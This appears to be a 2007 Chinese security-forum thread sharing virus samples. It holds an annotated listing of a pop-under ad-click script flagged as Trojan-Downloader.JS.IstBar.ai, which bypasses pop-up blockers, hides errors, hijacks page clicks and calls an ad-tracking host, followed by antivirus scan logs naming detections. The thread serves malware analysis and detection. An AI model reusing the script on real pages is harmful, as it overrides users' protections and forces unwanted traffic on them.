
[病毒样本] [c9cccf 4f6d7c 8f7935 2355ed]继续4个

jlennon
发表于 2007-6-15 11:53:16 | 显示全部楼层 |阅读模式

小邪邪
发表于 2007-6-15 11:55:05 | 显示全部楼层

脚本内容

// Analyst annotation of the pop-under / ad-click script posted above.
// Reformatted from the single collapsed line in the post: every token is kept as-is, only
// line breaks and comments were added. The forum rendering stripped the HTML markup that
// originally sat inside the document.write()/innerHTML string literals, so several literals
// below appear empty or are split across a line break, and element ids such as 'autoHit',
// 'getParentDiv', 'getParentFrame', 'objectRemover', 'detectGoogle' and the popIframe
// reference point at markup that is no longer visible in this listing.
// Detections quoted elsewhere in this thread: Trojan-Downloader.JS.IstBar.ai (Kaspersky),
// Trojan.Downloader.JS.Istbar.B / Application.JS.ForcePopup.I (BitDefender).
// Behavioural signature for detection: window.onerror suppression, restoring a pop-up
// blocker's saved window.open (SymRealWinOpen / NS_ActualOpen), IE createPopup() plus a
// synthetic fireEvent('onkeypress'), and a document.onclick hijack. Network indicator: the
// click.php request to the blankurl host carrying click_string and ads_click_test.

// Hex-looking string handed to the click tracker; appears to be hex-encoded ASCII
// (decode in a sandbox if the parameters are needed for an IoC report).
var click_string='353533312c323039322c313138313837313034382c687474703a2f2f7777772e676a7377772e636f6d2f426f6f6b2f32333137312e617370782c392c312c302c30';
// Beacon host; paypopupURL below is built on it.
var blankurl='http://n.ads8.com';
// 40-hex-character token; the same value is hard-coded a second time inside paypopupURL.
var ads_click_test='b40ccfe5ce564fcd774daef8d85c9f2c800b6e4b';
// Implicit globals (no var); AdsID presumably identifies the affiliate / ad slot.
ed_ads_open_class='1';
AdsID='2092';
// Kill switch: the whole payload runs only while totmp != 1, and totmp is always 0 here.
var totmp=0;
if(totmp!=1){
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Target of the pop-under: a click-tracking URL on the beacon host.
var paypopupURL=""+blankurl+"/pds_k/click.php?click_string="+click_string+"&ads_click_test=b40ccfe5ce564fcd774daef8d85c9f2c800b6e4b";
var usingActiveX = true;
// Swallow every script error so failed pop-up attempts stay invisible to the user.
function blockError(){return true;}
window.onerror = blockError;
// If a pop-up blocker has wrapped window.open and saved the original under one of these
// names, put the original back so the blocker is bypassed (the names suggest Norton /
// Netscape hooks — not verifiable from this listing).
if (window.SymRealWinOpen){window.open = SymRealWinOpen;}
if (window.NS_ActualOpen) {window.open = NS_ActualOpen;}
// State flags, guarded with typeof so a second copy of the script on the page does not
// reset them. usingActiveX was already set to true above, so that branch never fires here.
if (typeof(usingClick) == 'undefined') {var usingClick = false;}
if (typeof(usingActiveX) == 'undefined') {var usingActiveX = false;}
if (typeof(popwin) == 'undefined') {var popwin = null;}
if (typeof(poped) == 'undefined') {var poped = false;}
var blk = 1;                   // master enable for the click / ActiveX paths chosen in version()
var setupClickSuccess = false;
var googleInUse = false;       // set by detectGoogle(); selects the createPopup() path in tryActiveX()
var myurl = location.href+'/';
var MAX_TRIED = 20;            // poll cap for tryActiveX()/openActiveX() before falling back to setupClick()
var activeXTried = false;
var tried = 0;
var randkey = 'dsd1111';       // its tail becomes the keyCode of the synthetic keypress in openActiveX()
var myWindow;                  // window object reached through a helper element's .object.parentWindow
var popWindow;                 // IE-only window.createPopup() result
var setupActiveXSuccess = 0;   // 0..4 = retry count, 5 = give up, 6 = helper markup written
// Writes the IE-specific helper markup (a createPopup() window and, presumably, an iframe —
// popIframe is never declared in this listing) and retries every 500 ms up to 5 times via a
// string-form setTimeout; on the 5th failure falls back to click hijacking.
function setupActiveX() {if (usingActiveX) {try{if (setupActiveXSuccess < 5) {document.write('');popWindow=window.createPopup();popWindow.document.body.innerHTML='
';document.write('');popIframe.document.write('');setupActiveXSuccess = 6;}}catch(e){if (setupActiveXSuccess < 5) {setupActiveXSuccess++;setTimeout('setupActiveX();',500);}else if (setupActiveXSuccess == 5) {activeXTried = true;setupClick();}}}}
// Polls every 200 ms until the helper element inside popWindow (googleInUse) or popIframe
// exposes .object.parentWindow, stores that window as myWindow and calls openActiveX().
// After MAX_TRIED polls it gives up and falls back to setupClick().
function tryActiveX(){if (!activeXTried && !poped) {if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById('getParentDiv') && popWindow.document.getElementById('getParentDiv').object && popWindow.document.getElementById('getParentDiv').object.parentWindow) {myWindow=popWindow.document.getElementById('getParentDiv').object.parentWindow;}else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow){myWindow=popIframe.getParentFrame.object.parentWindow;popIframe.location.replace('about:blank');}else {setTimeout('tryActiveX()',200);tried++;if (tried >= MAX_TRIED && !activeXTried) {activeXTried = true;setupClick();}return;}openActiveX();window.windowFired=true;self.focus();}}
// Once myWindow exists, dispatches a synthetic onkeypress (IE fireEvent) on the element
// 'autoHit', whose handler lives in the stripped markup (presumably it calls showActiveX()).
// The keyCode is escape(randkey) with its first character dropped. Bounded by MAX_TRIED.
function openActiveX(){if (!activeXTried && !poped) {if (myWindow && window.windowFired){window.windowFired=false;document.getElementById('autoHit').fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));}else {setTimeout('openActiveX();',100);}tried++;if (tried >= MAX_TRIED) {activeXTried = true;setupClick();}}}
// Opens paypopupURL as a pop-under from myWindow: the new window is blurred and focus is
// handed back to the page so the user does not notice it. Not called directly anywhere in
// this listing. On failure it retries once through the googleInUse path (after detaching
// the helper object under 'objectRemover'), then falls back to setupClick().
function showActiveX(){if (!activeXTried && !poped) {if (googleInUse) {window.daChildObject=popWindow.document.getElementById('objectRemover').children(0);window.daChildObject=popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);}newWindow=myWindow.open(paypopupURL,'ed_opX_code');if (newWindow) {newWindow.blur();self.focus();activeXTried = true;poped = true;}else {if (!googleInUse) {googleInUse=true;tried=0;tryActiveX();}else {activeXTried = true;setupClick();}}}}
// Plain window.open() attempt, used when neither the click nor the ActiveX path is selected;
// if the window was blocked, hands off to tryActiveX() or setupClick().
function paypopup(){if (!poped) {if(!usingClick && !usingActiveX) {popwin = window.open(paypopupURL,'ed_opX_code');if (popwin) {poped = true;}self.focus();}}if (!poped) {if (usingActiveX) {tryActiveX();}else {setupClick();}}}
// Click hijacking: replaces document.onclick so the user's next click anywhere on the page
// opens the pop-under (a user-initiated click is what pop-up blockers let through). The
// previous handler is saved in the implicit global prePaypopOnclick and chained by gopop().
function setupClick() {if (!poped && !setupClickSuccess){if (window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick = document.onclick;document.onclick = gopop;self.focus();setupClickSuccess=true;}}
// The hijacked click handler: opens the pop-under once, then runs the original handler.
function gopop() {if (!poped) {popwin = window.open(paypopupURL,'ed_opX_code');if (popwin) {poped = true;}self.focus();}if (typeof(prePaypopOnclick) == "function") {prePaypopOnclick();}}
// Writes probe markup (stripped here) and sets googleInUse when an element with id
// 'detectGoogle' exists afterwards; the name suggests a check for the Google Toolbar's
// pop-up blocker. Retries every 50 ms on exception.
function detectGoogle() {if (usingActiveX) {try {document.write('

');googleInUse|=(typeof(document.getElementById('detectGoogle'))=='object');}catch(e){setTimeout('detectGoogle();',50);}}}
// User-agent sniffing. os, bs and isframe are computed but never read, and
// `paypopupURL = paypopupURL` is a no-op (leftovers). The effective outputs are usingClick
// (IE with the "SV1" token, Opera or Firefox) and usingActiveX (IE with "SV1", i.e. the
// XP SP2 build that ships a pop-up blocker, and not Opera).
function version() {var os = 'W0';var bs = 'I0';var isframe = false;var browser = window.navigator.userAgent;if (browser.indexOf('Win') != -1) {os = 'W1';}if (browser.indexOf("SV1") != -1) {bs = 'I2';}else if (browser.indexOf("Opera") != -1) {bs = "I0";}else if (browser.indexOf("Firefox") != -1) {bs = "I0";}else if (browser.indexOf(" Microsoft") != -1 || browser.indexOf("MSIE") != -1) {bs = 'I1';}if (top.location != this.location) {isframe = true;}paypopupURL = paypopupURL;usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf(" Microsoft") != -1) || (browser.indexOf("MSIE") != -1));detectGoogle();}
version();
// Dispatcher: direct open, ActiveX helper, or click hijack, depending on version()'s flags.
function loadingPop() { if(!usingClick && !usingActiveX) { paypopup(); } else if (usingActiveX) {tryActiveX();} else {setupClick();} }
// myurl is truncated to scheme + host but never read afterwards.
myurl = myurl.substring(0, myurl.indexOf('/',8));
if (myurl == '') {myurl = '.';}
setupActiveX();
loadingPop();
self.focus();
}


小邪邪
发表于 2007-6-15 11:55:55 | 显示全部楼层

AVK

XinDOS
发表于 2007-6-15 11:56:12 | 显示全部楼层
卡巴斯基互联网安全套装 6.0: The requested URL http://bbs.kafan.cn/attachment.php?aid=87645 is infected with Trojan-Downloader.JS.IstBar.ai virus

蓝色牛仔裤
发表于 2007-6-15 11:58:58 | 显示全部楼层
蜘蛛殺htm 是小概率事件。。。。
mofunzone
发表于 2007-6-15 12:08:43 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\yoyosf[1].zip'
C:\Documents and Settings\Administrator\My Documents\
  yoyosf[1].zip
    [0] Archive type: ZIP
    --> yoyosf[1].htm
Begin scan in 'C:\Documents and Settings\Administrator\My Documents\ifuckhackerdewife[1].zip'
C:\Documents and Settings\Administrator\My Documents\
  ifuckhackerdewife[1].zip
    [0] Archive type: ZIP
    --> ifuckhackerdewife[1].js
        [DETECTION] Contains suspicious code HEUR/Exploit.HTML
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!
Begin scan in 'C:\Documents and Settings\Administrator\My Documents\mm[1].zip'
C:\Documents and Settings\Administrator\My Documents\
  mm[1].zip
    [0] Archive type: ZIP
    --> mm[1].htm
        [DETECTION] Contains signature of the exploits EXP/Agent.B
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!
Begin scan in 'C:\Documents and Settings\Administrator\My Documents\view[1].zip'
C:\Documents and Settings\Administrator\My Documents\
  view[1].zip
    [0] Archive type: ZIP
    --> view[1].htm
woai_jolin
发表于 2007-6-15 12:43:02 | 显示全部楼层
扫描开始时间: 2007/6/15 12:38:46
扫描日志
NOD32 版本 2330 (20070615) NT
命令行: D:\病毒测试
C:\Program Files\Eset\nod32.exe<病毒 - 正常>
物理磁盘 1 的 MBR 扇区,<病毒 - 正常>
物理磁盘 1 的活动引导扇区,<病毒 - 正常>

日期: 2007年6月15日  时间: 12:38:48
反 Rookits 技术已启用。
已扫描磁盘、文件夹和文件: D:\病毒测试\
D:\病毒测试\ifuckhackerdewife[1].zip »ZIP »ifuckhackerdewife[1].js<病毒 - 正常>
D:\病毒测试\ifuckhackerdewife[1].zip:Zone.Identifier<病毒 - 正常>
D:\病毒测试\mm[1].zip »ZIP »mm[1].htm<病毒 - VBS/TrojanDownloader.Psyme.NAV 木马> - 是删除目标的一部分
D:\病毒测试\view[1].zip »ZIP »view[1].htm<病毒 - 正常>
D:\病毒测试\view[1].zip:Zone.Identifier<病毒 - 正常>
D:\病毒测试\yoyosf[1].zip »ZIP »yoyosf[1].htm<病毒 - 正常>
D:\病毒测试\yoyosf[1].zip:Zone.Identifier<病毒 - 正常>
已扫描文件数量: 8
已发现病毒数量: 1
已清除病毒的文件数量: 1
完成时间: 12:38:48 总共扫描时间: 0 秒 (00:00:00)
1688388728
发表于 2007-6-15 14:10:50 | 显示全部楼层
病毒: Trojan-Downloader.JS.Psyme.gw

Virus beim Laden von Web-Inhalten gefunden.

Adresse: bbs.kafan.cn                   病毒: Trojan-Downloader.HTML.Agent.df

Virus beim Laden von Web-Inhalten gefunden.

Adresse: bbs.kafan.cn                   病毒: Trojan-Downloader.JS.IstBar.ai

Virus beim Laden von Web-Inhalten gefunden.

Adresse: bbs.kafan.cn
taihuxian
发表于 2007-6-15 19:34:03 | 显示全部楼层

BD全灭

BitDefender

This web page has been blocked by BitDefender Antivirus Real-time Protection!

The blocked web page included objects that were either infected or likely to be infected with a virus. Your system has NOT been infected.

Trojan.Downloader.JS.Istbar.B
Application.JS.ForcePopup.I
q=Trojan.Downloader.JS.Istbar.B
q=Generic.XPL.ADODB.40627830